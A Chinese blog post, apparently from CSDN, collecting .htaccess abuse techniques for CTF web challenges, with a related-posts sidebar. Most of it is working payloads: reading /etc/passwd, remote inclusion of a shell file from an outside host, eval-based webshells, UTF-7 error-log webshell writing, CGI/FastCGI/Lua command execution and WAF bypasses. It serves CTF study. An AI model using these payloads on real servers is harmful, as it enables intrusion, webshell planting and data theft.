[CTF].htaccess的使用技巧总结

最新推荐文章于 2024-03-09 20:31:32 发布
置顶 最新推荐文章于 2024-03-09 20:31:32 发布
阅读量9.7k 收藏 159
点赞数 46
分类专栏: 安全学习 # Web # Trick
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/116666720
版权
安全学习 同时被 3 个专栏收录
210 篇文章 81 订阅
订阅专栏
Web
94 篇文章 21 订阅
订阅专栏
Trick
3 篇文章 2 订阅
订阅专栏

文章目录

前言

这周参加了津门杯,发现htaccess学的不深入,并且没有总结,我反思好吧

.htaccess

什么是htaccess文件

简介

.htaccess是一个配置文件,用于运行Apache网络服务器软件的网络服务器上。当.htaccess文件被放置在一个 "通过Apache Web服务器加载 "的目录中时,.htaccess文件会被Apache Web服务器软件检测并执行。这些.htaccess文件可以用来改变Apache Web服务器软件的配置,以启用/禁用Apache Web服务器软件所提供的额外功能和特性。

.htaccess文件提供了针对目录改变配置的方法, 即在一个特定的文档目录中放置一个包含一条或多条指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过 Apache 的 AllowOverride 指令来设置。

Eg:.htaccess 中有 # 单行注释符, 且支持 \拼接上下两行。(注意后面这个东西很重要)

其他

.htaccess文件所在的目录及其所有子目录,若要启动.htaccess配置文件,我们需要在服务器的主配置文件将 AllowOverride 设置为 All

AllowOverride All  #启动.htaccess文件的使用

常见使用方式

自定义出错界面

我们可以使用.htaccess 创建自定义的出错页面。对于Linux Apache来说这是一项极其简单的事情。使用下面的.htaccess语法你可以轻松的完成这一功能。(把.htaccess放在你的网站根目录下),这个在这次比赛当中Nu1l战队师傅用了,打call

ErrorDocument 401 /error/401.php
ErrorDocument 403 /error/403.php
ErrorDocument 404 /error/404.php
ErrorDocument 500 /error/500.php

当时出flag是这样的


<If "file('/flag') =~ '/flag{a/'">
ErrorDocument 404 "y4tacker"
</If>

假设flag为flag{testflag}
通过后面flag{a不断变换字符一直到flag{t,页面就会出现y4tacker

SetHandler和ForceType

强制所有匹配的文件被一个指定的处理器处理
用法

ForceType application/x-httpd-php
SetHandler application/x-httpd-php

AddHandler

AddType application/x-httpd-php .htm,则.htm文件也可以执行php程序
AddHandler cgi-script .yyy 则扩展名为.yyy的文件作为 CGI 脚本来处理

AddType

AddType 可以将给定的文件扩展名映射到指定的内容类型

AddType application/x-httpd-php .xxx 同上AddHandler的作用

php_value

当使用 PHP 作为 Apache 模块时,也可以用 Apache 的配置文件(例如 httpd.conf)和 .htaccess 文件中的指令来修改 php 的配置设定。需要有AllowOverride Options 或AllowOverride All 权限才可以。

php_value 设定指定的值。要清除先前设定的值,把 value 设为 none。不要用 php_value 设定布尔值。应该用 php_flag

而.htaccess 只能用于 PHP_INI_ALL 或 PHP_INI_PERDIR 类型的指令(https://www.php.net/manual/zh/configuration.changes.modes.php)
而具体的类型的指令可以参考官方文档https://www.php.net/manual/zh/ini.list.php

在CTF当中的文件上传可以利用这个来实现传一句话木马

php_value auto_prepend_file 1.txt 在主文件解析之前自动解析包含1.txt的内容
php_value auto_append_file 2.txt 在主文件解析后自动解析1.txt的内容

刚刚看到网上师傅又说了,可以用来绕过preg_match,我们可以用最大回溯(pcre.backtrack_limit)/递归限制使php正则失效

php_value pcre.backtrack_limit 0

当然还有设置其他方式,下面都是可以的,我们看官方配置,PCRE配置选项

名字默认可修改范围更新日志
pcre.backtrack_limit100000PHP_INI_ALLphp 5.2.0 起可用
pcre.recursion_limit100000PHP_INI_ALLphp 5.2.0 起可用用
pcre.jit1PHP_INI_ALLPHP 7.0.0 起可用

设置正则回朔次数来使正则匹配的结果返回为 false 而不是0 ,从而可以绕过正则。

php_flag

用 php_flag设置布尔值,可以将 engine 设置为 0,在本目录和子目录中关闭 php 解析,造成源码泄露

Trick总结

利用404页面

出flag是这样的


<If "file('/flag') =~ '/flag{a/'">
ErrorDocument 404 "y4tacker"
</If>

假设flag为flag{testflag}
通过后面flag{a不断变换字符一直到flag{t,页面就会出现y4tacker

文件包含

本地文件包含

当前目录下php文件头引入/etc/passwd

php_value auto_append_file /etc/passwd

使作用范围内的php文件在文件头/尾自动include指定文件,支持php伪协议,.htaccess可以设置php_value include_path "xxx"将include()的默认路径改变

php_value include_path "xxx"

举个例子,也就会输出一个好东西

<?php

ini_set("include_path","../../../../../../../../");

include "etc/passwd";

远程文件包含

PHP 的 all_url_include 配置选项这个选项默认是关闭的,如果开启的话就可以远程包含。因为 all_url_include 的配置范围为 PHP_INI_SYSTEM,所以无法利用 php_flag 在 .htaccess 中开启。设置好了以后

php_value auto_append_file http://xxxxx.xxxx.xxx/shell.txt

可以利用伪协议

需要all_url_fopenall_url_includeOn

php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
或
php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
或
php_value auto_append_file "php://filter/convert.base64-decode/resource=shell.txt"

htaccess把自己指定当做 php文件处理

当前目录下有php文件

php_value auto_append_file .htaccess
#<?php phpinfo();

对于有过滤的情况我们前面说了可以使用\

php_value auto_prepend_fi\
le .htaccess
#<?php phpinfo();

当前目录下无php文件

重点:需要先设置允许可访问 .htaccess 文件

<Files .htaccess>
//ForceType application/x-httpd-php
SetHandler application/x-httpd-php
Require all granted
php_flag engine on
</Files>
php_value auto_prepend_fi\
le .htaccess
#<?php phpinfo();


<FilesMatch .htaccess>
//ForceType application/x-httpd-php
SetHandler application/x-httpd-php
Require all granted
php_flag engine on
</FilesMatch>
php_value auto_prepend_fi\
le .htaccess
#<?php phpinfo();

或 将 .htaccess指定当做 php文件处理,一般不用这个感觉

SetHandler application/x-httpd-php
# <?php phpinfo(); ?>

文件解析配合一句话木马

<FilesMatch  "y4tacker">
SetHandler  application/x-httpd-php
//或ForceType application/x-httpd-php
</FilesMatch>


AddType application/x-httpd-php .txt


AddHandler php7-script .txt

Cgi执行

如果开启了cgi扩展,也可以来解析shell脚本,也就是说cgi_module 需要加载,即 apache 配置文件中有,如 apache2.conf中

LoadModule cgi_module modules/mod_cgi.so

.htaccess

Options +ExecCGI #允许CGI执行
AddHandler cgi-script .sh

再写个

#!/bin/bash
echo "Content-Type: text/plain"
echo ""
ls /
exit 0

FastCgi执行

mod_fcgid.so需要被加载。即 apache2.conf中

LoadModule fcgid_module modules/mod_fcgid.so

.htaccess

Options +ExecCGI
AddHandler fcgid-script .kk
FcgidWrapper "/bin/ls /" .kk

再写一个y4.kk 内容随意
就会执行上面内容

lua执行

来自feng师傅补充,2020年西湖论剑 newupload,当然肯定还有一堆各种各样脚本语言了,

AddHandler lua-script .lua

随便写一个lua文件

require "string"

function handle(r)
    r.content_type = "text/plain"
    local t = io.popen('/readflag')
    local a = t:read("*all")
    r:puts(a)

    if r.method == 'GET' then
        for k, v in pairs( r:parseargs() ) do
            r:puts( string.format("%s: %s\n", k, v) )
        end
    else
        r:puts("Unsupported HTTP method " .. r.method)
    end
end

利用报错信息写马

首先写入.htaccess error_log相关的配置

php_value include_path "/tmp/xx/+ADw?php die(eval($_GET[1]))+ADs +AF8AXw-halt+AF8-compiler()+ADs"
php_value error_reporting 32767
php_value error_log /tmp/fl3g.php

上面那些神奇字符是utf7编码,可以用下面的方式得到

<?php
$filename = "php://filter/write=convert.iconv.utf-8.utf-7/resource=y4.txt"; //utf-16le编码写入文件

file_put_contents($filename, "<?php phpinfo();?>");

或者

mb_convert_encoding('<?php eval($_GET[\'cmd\']); ?>',"utf-7");

Step2 访问index.php留下error_log
Step3 写入.htaccess新的配置

php_value zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value include_path "/tmp"

Step4 再访问一次index.php?1=whoami

绕过exif_imagetype()上传.htaccess

采用xbm格式X Bit Map,绕过exif_imagetype()方法的检测,上传文件来解析。在计算机图形学中,X Window系统使用X BitMap,一种纯文本二进制图像格式,用于存储X GUI中使用的光标和图标位图。XBM数据由一系列包含单色像素数据的静态无符号字符数组组成,当格式被普遍使用时,XBM通常出现在标题.h文件中,每个图像在标题中存储一个数组。也就是用c代码来标识一个xbm文件,前两个#defines指定位图的高度和宽度,以像素为单位

#define width 20
#define height 10
xxxxxx

\号绕过waf

比如过滤了file,我们可以使用

php_value auto_prepend_fi\
le .htaccess
#<?php phpinfo();

\号绕过藏字符

假设在写入文件同时后面默认加上file_put_contents($filename, $content . "\nhappy"),我们payload最后可以加上#\,#负责注释,

php_value include_path "/tmp"
php_value zend.multibyte 1
php_value zend.script_encoding "UTF-7"
# \
happy

\将注释符和脏字符连成一行,注释掉脏字符

参考文章

https://httpd.apache.org/docs/2.4/expr.html
https://xz.aliyun.com/t/8267
http://www.htaccess-guide.com/
https://www.anquanke.com/post/id/185377#h3-4

Y4tacker
关注
  • 46
    点赞
  • 159
    收藏
    觉得还不错? 一键收藏
  • 24
    评论
专栏目录
unrar-ctf.tar.gz
05-21
unrar-ctf.tar.gz 写了一个工具ctfrar,对rar文件合法性进行检查。并输出错误位置
科总CTF Binary小技巧.ppt
02-25
科总CTF Binary小技巧.ppt
CTFHub |文件上传 (无验证, 前端验证, .haccess绕过, MIME绕过, 00截断, 双写后缀, 文件头检查)
最新发布
weixin_73688004的博客
03-09 988
这里很奇特的一点:我尝试构造a.phpphp,上传后的文件是a. 也就是说,两个php都被替换为空了。猜测这个str_ireplace()函数应该是设置一个指针,遍历整个字符串,边遍历便查找,一经找到就删除,继续往后查找,而不是找到第一个就删除并返回。复制89504E47, 在文件开头>编辑>剪贴板数据>粘贴>ASCII Hex, 保存退出。这里有两个Content-Type字段,第一个用来限定文件显示范围的,第二个才是限定文件类型。第一种方法:按理来说应该也可以,上传也成功,但是出现不解的问题。
ctf.rar_ctf
09-21
this is script from my ctf
ctf.rip:CTF.RIP Jekyll静态网站
04-04
ctf.rip-来自捕获赃物的CTF编写 此存储库包含ctf.rip网站的Jekyll源,该源通过构建Jekyll站点,然后将生成的_site/路径部署到_site/进行部署。 生产网址: : 要添加帖子: 将新的markdown文件添加到_posts/ 用jekyll build 部署: 切换到_site/文件夹 使用netlify deploy进行netlify deploy 网站信息: 主题: 主持人: 作者: 克里斯·亨特( )
.htaccess文件在文件解析漏洞中的妙用
weixin_52796034的博客
08-23 186
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可 以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录 的访问、禁止目录列表、配置默认文档等功能。设置当前目录(.htaccess文件所在目录)所有文件都使用PHP解析,那么无论上传任何文件,只要文件内容符合PHP语言代码规范, 就会被当作PHP执行。不符合则报错。
CTFHub | .htaccess
尼泊罗河伯的博客
03-18 1210
htaccess 文件是 Apache 服务器中的一个配置文件,它负责相关目录下的网页配置。通过 htaccess 文件,可以帮我们实现:网页 301 重定向、自定义 404 错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
ini文件注释_CTF.htaccess文件的利用
weixin_39630762的博客
11-27 189
CTF.htaccess文件的利用.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过.htaccess文件可以在所在文件夹和子文件下改变php.ini的配置。在CTF的题目中,如果能够上传或者写入一个.htaccess,我们就可以做到比如说绕过WAF,以及文件包含等操作,因为之前打羊城杯看到.htaccess的文件的利用,就想把我自己之前遇到过...
解决 linux tab 不提示问题, cannot create temp file for here-document:No sapce left on device
汇杰IT博客
07-22 1326
1、问题发现 我要进一个文件夹,然后Tab键进行补全,然后呢就显示: 2、解决问题 查看磁盘文件 df -h 发现根目录爆满然后进入根目录,查看那个文件占的内存比较多, cd / du -sh * 我查看之后是/var文件下的下的log日志文件比较多,然后删除日志文件 释放完成后,即可 ...
CTFHub-文件上传-.htaccess文件
qq_60905276的博客
11-19 1200
了解一下题目所说的htaccess文件。 他是Apache服务器中的一个配置文件,它负责相关目录下的网页配置,属于后端中间件的验证。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。看来权限还很大啊。 其中.htaccess文件内容:SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析,那么无论上传任何文件,只要符合php语言代码
.htaccess文件上传CTF讲解
hxhxhxhxx的博客
07-06 3252
.htaccess文件上传CTF详解题目解法方法2 题目 解法 我们先写一个htaccess文件 通过它调用php解析器去解析一个文件名中只要包含"haha"这个字符串的任意文件,无论扩展名是什么(没有也行),都会以php的方式来解析 <FilesMatch "haha"> SetHandler application/x-httpd-php </FilesMatch> 或者如下,上传一个文件名为evil.gif的图片马: <FilesMatch "evil.gi
CTF.unitypackage
04-20
老版本拓展包将就用
警惕htaccess文件上传解析漏洞
whatiwhere的博客
11-24 9336
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 了解htaccess文件解析的利用方法 掌握如何去修复此漏洞 实验工具 中国菜刀:是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理,本次试验主要用到其动态脚本管理功能 实验内容 实验步骤 步骤1:...
ctfhub-前端验证,.htaccess,MIME绕过,文件头检查,00截断,双写后缀
weixin_55702959的博客
02-02 1148
目录 文件上传-前端验证 文件上传-.htaccess 文件上传-MIME绕过 文件上传-文件头检查 文件上传-00截断 文件上传-双写后缀 eval执行 文件上传-前端验证 上传文件时,客户端的javascript会对文件的类型进行一个校验,只允许 “.jpg” “.png” ".gif"的文件上传,于是关掉他 about:config 一句木马 <?php @eval($_POST['123']); ?> 命名为1.php之后上传文件,用蚁剑打...
文件上传漏洞详解(CTF篇)
热门推荐
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件上传: 文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马
CTF】文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 4472
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
ctfhub文件上传---.htaccess
x2813488062的博客
01-28 1008
.htaccess详解 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。 .htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。 .htac..
CTFHUB-文件上传(二).htaccess文件利用
慢就是快
04-01 386
文章目录1.简介2.题目3.思路4.上传.htaccess5.上传图片马6.连接蚁剑7.获取Flag 1.简介 htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能 2.题目 3.思路 上传.htaccess文件,设置任意文件都能解析成PHP,然后上传图片马即可! 4.上传.htaccess 首先我们先上传一
CTFhub htaccess文件【不用连webshell工具查看flag】
luminous_you的博客
12-08 885
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能 康康源代码,有黑名单限制 上传.htacess文件,内容为 <FilesMatch "is"> setHandler application/x-httpd-php </FilesMatch> 上传一句话木马c.is <?p
ctfhub .htaccess
10-09
.htaccess是一个Apache服务器配置文件,它允许在特定目录中设置特定的配置选项。对于CTFHub来说,.htaccess文件可以用于实施访问控制和安全性措施。 在CTFHub中,可以使用.htaccess文件进行以下操作: 1. 限制访问:通过.htaccess文件,可以设置密码保护,只有知道密码的用户才能访问该目录。 2. 重定向:可以将特定URL重定向到其他URL。这在管理网站流量和更改URL结构时非常有用。 3. 防止目录列表:通过设置Options -Indexes,可以禁止在没有默认索引文件的情况下列出目录中的文件。 4. 禁止文件类型:通过在.htaccess中添加适当的规则,可以阻止特定类型的文件被访问或下载。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 24
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值